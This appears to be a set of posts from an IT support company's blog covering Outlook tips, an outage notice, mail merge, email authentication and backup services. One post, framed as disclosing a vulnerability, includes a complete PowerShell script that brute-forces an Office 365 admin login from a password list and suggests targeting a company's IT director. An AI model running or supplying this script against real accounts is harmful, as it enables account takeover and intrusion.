The Report Message add-in for Outlook and Outlook on the web enables people to easily report misclassified email, whether safe or malicious, to Microsoft and its affiliates for analysis. Microsoft uses these submissions to improve the effectiveness of email protection technologies.
People who have the add-in assigned to them will see the following icons:
In Outlook, the icon looks like this:
In Outlook on the web, the icon looks like this:
If you have a junk or phishing message in your inbox, please click this icon and report it accordingly. Junk/spam is classified as unwanted email – usually an advertisement (nutrisystem, unwanted newsletters, etc). Phishing emails are generally emails with links that prompt you to put in your password or respond in a way that reveals personal information.
If you choose Junk, Phishing, or Not Junk, you’ll have the option to send a copy of the message to Microsoft, along with your classification of the message. Please send a copy to Microsoft as this helps improve their database and protects your company and others from similar spam/phishing. If you are unsure the best category, we suggest marking it as junk. The most important thing is submitting it to the Microsoft database – they can organize it how they see fit on their end.
Update: This issue has been resolved and it is now safe to restart Outlook.
Microsoft Outlook on Windows is crashing worldwide due to An issue on Office 365’s servers. If you close out of Outlook and you are on the most recent version your Outlook will probably not re-open. Please refrain from restarting Outlook. This issue is not reported as affecting Outlook on mobile or web. If your Outlook is not working, please call our office at 859-226-9222 and we can apply a workaround or use webmail (https://mail.office365.com) until the issue is resolved at Office 365.
We will update this page when the issue is resolved.
Ongoing Updates 7/16/2020 @ 8:55AM EST – Issue has been resolved per Microsoft. “We’ve confirmed that the issue has been successfully resolved after extended monitoring of our telemetry. If users are continuing to see impact, please restart your Outlook client for the changes to take effect.” – Microsoft 7/15/2020 @ 6:15PM EST – Most users are not experiencing this issue anymore. We suggest not restarting Outlook until this issue is completely resolved. Per Microsoft “Our service telemetry indicates that the vast majority of customers have received our fix; however, we’re still observing some signs of lingering impact to a subset of users. Users that are still impacted may need to restart their Outlook client for the fix to take effect.” 7/15/2020 @ 3:03PM EST – Microsoft is working to fix the issue. The issue is still present. Please refrain from restarting Outlook. 7/15/2020 @ 1:45PM EST – Microsoft is working to fix the issue. The issue is still present. Please refrain from restarting Outlook.
We’ve run into a few Dell laptops that are getting a BSOD SYSTEM_THREAD_EXCEPTION_NOT_HANDLED
We discovered this is due to the Dell Unified Wireless Suite. Easy workaround is to rename the folder ‘C:\Program Files (x86)\Dell\Dell Unified Wireless Suite’ to something else via PSExec or some other remote background tool. You can also boot into safe mode and rename the folder, or if you’re quick enough you may be able to log in normally and open task manager, then disable the Unified Wireless Suite.
You can send faxes from your email software if you follow these instructions.
Email-to-Fax supports up to 5 attachments. Attachments may be sent in JPG, PDF, Adobe PostScript, TIFF, Microsoft Word, Excel, CSV, HTML & Plain Text formats.
To: 10_digit_number_you_want_to_send_to>@emailyourfax.com
Subject: put_your_vfax_number_here
Body: please leave the body of the message blank
Upon submission the service will reply with a confirmation or rejection notice.
Sometimes you need to write letters to multiple people, basically saying the same thing over and over again with variations on the text. For example, we recently did a GSuite Email Migration for a company in Lexington, KY. Instead of sending out individual emails to them letting them know how far along their data sync was, I could use the Mail Merge feature to compile the data.
The idea here is, for each row of Excel spreadsheet data, to make a letter with variables from the row.
For this example, I have a few fields from the Gsuite Migration report that I would like to share with the customer. I’ll be pulling their email address, how many emails have been migrated from their old mailbox to GSuite, and the percentage that it is complete.
Search for ‘Mail Merge’ in the search box of word
Select ‘Start Mail Merge’ – ‘Step-By-Step Mail Merge …’
Select ‘Letters’
Click ‘Next: Starting document’
Use the Current Document
Click ‘Next: Select recipients’
Use an Existing List
Click Browse
Select the spreadsheet you want to pull data from. This should show you your spreadsheet data. Click ‘OK’
Click ‘Next: Write your Letter’
Now we will pull data from our spreadsheet to the document.
Click ‘More Items’
Highlight the field you would like to be inserted and press ‘Insert’
After you’re done drafting your letter and inserting the fields, click ‘Next: Preview your letters’
This will fill in the data for you to give you an idea of what it will look like.
Click ‘Next: Complete the merge’
From here, you can click print to print them or Edit Individual Letters to save a document with all the letters.
For this example, my letter looked like
«G_Suite_Username»
«Number_of_emails_migrated» have been migrated from your account.
Your GSuite Migration is «Percent_complete»% complete.
Thank you, CSSI – Lexington, KY GSuite and Office 365 Migration and Support Experts
Hope that helps anyone struggling to figure this out!
Here’s the scenario, you have a saved password in Winbox for the admin user and you can sign in, but you don’t know what the password is.
There are tons of posts about recovering Mikrotik passwords if you have an Address.cdb file, but unfortunately those only apply to older versions of Winbox.
The best thing to do is log into Winbox with your saved credentials and create a new user with Group: full.
Then reset the admin password and log in. For safety, log into the web interface so you don’t accidentally burn your saved Winbox password.
This then made me wonder about composite authentication and what a softpass is.
While SPF, DKIM, and DMARC are all useful by themselves, they don’t communicate enough authentication status in the event a message has no explicit authentication records. Therefore, Microsoft has developed an algorithm that combines multiple signals into a single value called Composite Authentication, or compauth for short. Customers in Office 365 have compauth values stamped into the Authentication-Results header in the message headers.
Message failed explicit authentication (sending domain published records explicitly in DNS) or implicit authentication (sending domain did not publish records in DNS, so Office 365 interpolated the result as if it had published records).
pass
—————————————— Message passed explicit authentication (message passed DMARC, or Best Guess Passed DMARC) or implicit authentication with high confidence (sending domain does not publish email authentication records, but Office 365 has strong backend signals to indicate the message is likely legitimate).
softpass
——————————————Message passed implicit authentication with low-to- medium confidence (sending domain does not publish email authentication, but Office 365 has backend signals to indicate the message is legitimate but the strength of the signal is weaker).
none
——————————————Message did not authenticate (or it did authenticate but did not align), but composite authentication not applied due to sender reputation or other factors.
So essentially, a pass is softpass is when there are no DMARC records, but Office 365 is pretty sure that this domain is the appropriate sender. A pass is when either a DMARC record is published and it passes, or Microsoft is very sure the email is legitimate.
By default, softpass is not marked as junk. I think this is a pretty good setting since not a lot of domains have DMARC setup.
Putting this together real quick. Hoping to get some publicity on it because I think it is a major vulnerability.
Today we were auditing a client’s security and discovered that Office 365 will let you brute force them, all day long. Seemingly without restriction.
I notified an Office 365 representative that this was an issue, and their solution was to enable two factor authentication. However, this doesn’t apply to a lot of admin accounts that exist on Office 365.
The process an attacker would use would be to figure out who the IT director is of a major company, put their email address in this script and test against a password list.
# Login to O365 Import-Module MSOnline # Account you wish to brute force $username = “admin@microsoft.com” # Attempt logins using every password in your password list $x=0 foreach ($password in get-content password_list.txt) { $x=$x+1; Write-Host “Attempt #$x” Write-Host “Trying password $password” $password = $password | ConvertTo-SecureString -asPlainText -Force $O365Cred = New-Object System.Management.Automation.PSCredential($username,$password) $O365Session = New-PSSession –ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell -Credential $O365Cred -Authentication Basic -AllowRedirection Connect-MsolService –Credential $O365Cred #Check a command. If the command has output that means your password is good. $Domains = Get-Msoldomain if ($Domains) { exit } }
It seems Office 365 is not restricting bad login attempts. I’ve been attempting to login for over 3 hours now and have passed 1000+ passwords. I’ve heard that they will reduce the speed at which you can login, but that doesn’t seem like the case based on my data.
Azure Active Directory shows sign in failures
…and even says that “Account is locked because user tried to sign in too many times with an incorrect user ID or password.” which is not true since I can still log in with that account.
Multifactor authentication does prevent this. When the password is guessed correctly I get a login box which forces 2FA on me. This tells me the password is right, I just need to get access to the user’s device, which is much harder from a distance.
Moral of this story, turn on 2FA for your Office 365 Admin accounts. Microsoft can you please do something about this?
Update: Microsoft does have an article with details on how to secure the global admin accounts. One of the best ways is to use a separate account with the username generated by a random password generator + random password + multifactor authentication. https://support.office.com/en-us/article/protect-your-office-365-global-administrator-accounts-6b4ded77-ac8d-42ed-8606-c014fd947560
Recently Hilton.com made security changes to their email, preventing some domains from being able to send to it. This is a security improvement, but does have consequences for misconfigured email senders. This is likely a misconfiguration of your email. CSSI can work with you to configure your email so it can send to Hilton.com. Give us a call at 869-226-9222 to discuss an email audit for your email.
If a server does not have a backup and crashes, all data could be lost. Even if data could be recovered, data recovery can range from hundreds to thousands of dollars – and include possible downtime of several days or more. The hard drive that stores the data is a moving part, that will eventually deteriorate, fail, and require replacement. When this time comes it is very important to have a backup. (Proactivemeasures can be taken to determine when a drive is failing – which we cover with our Server Monitoring package)
A backup solution protects from data loss in the event of server failure. A managed backup solution provides monitoring of the backup – confirming it is working as expected. It is very important to monitor the backup solution for failures. It is common for a non-managed backup solution to have an issue and stop backing up, making the backup setup useless. CSSI’s managed backup solution monitors the backup, confirming the backup is completing and the backup software is working appropriately.
CSSI recommends a hybrid local and cloud backup as this combination offers protection from most types of possible hardware or software failures. After the initial setup, CSSI will manage both the local and cloud backups for you – looking for issues on a daily basis and doing any maintenance necessary.
Local Backup: The local backup provides a complete backup of your server to an external hard drive or local backup server. A local backup has many advantages: Restoring from a local backup is faster than from a cloud backup. Additionally, local backup allows full restoration of an entire server, while a cloud backup typically provides file-level backup. A disadvantage of local backup is that it does not protect from fire or other damages to the hardware. To address this disadvantage, CSSI recommends the local backup drive be rotated out weekly to provide full offsite redundancy for your server. If a fire destroyed the backup drive you could restore the server from the offsite backup drive, but the files would be out of date. This is where cloud backup has advantages.
Cloud Backup: The cloud backup provides a file-level backup of your server to a secure and encrypted cloud storage. Cloud backup protects from physical destruction like tornadoes or fire and has the advantage of always being up-to-date. A disadvantage of cloud backup is that it can’t typically do full server backup – just file level.
Solution – Hybrid Managed Backup Solution (Local and Cloud Backup)
CSSI manages and provides all labor, hardware and software required for multiple levels of backup. Protects the server, user information on server, and files.
Backup of server including different facets required for server
Managed – monitor the daily, weekly, and monthly operations of each backup level
All hardware and subscriptions provided and managed by CSSI
Multiple level backup AND multiple generation backup
Local Backups
Backup of everything listed below
Rotating hard drives (daily backup, approximately 2-month history kept, rotated onsite)
Drive rotated by designated client user (CSSI does all the server and software – client just has to plug in cable periodically)
Additional Cloud backups
All client data (file shares)
Does exclude some server/IT information
This additional redundancy is a cloud based backup service with additional daily backup and approximately 3 week history kept
Complete CSSI management of the backup process, ongoing audit and checks of backup
CSSI availability for support from simple deleted file restore to recovery of an entire server
Items to be backed up
Server Operating System
User database
Shared files
Server configuration information (also includes IT information and assets like DNS, DHCP, Group Policy and other data as appropriate)
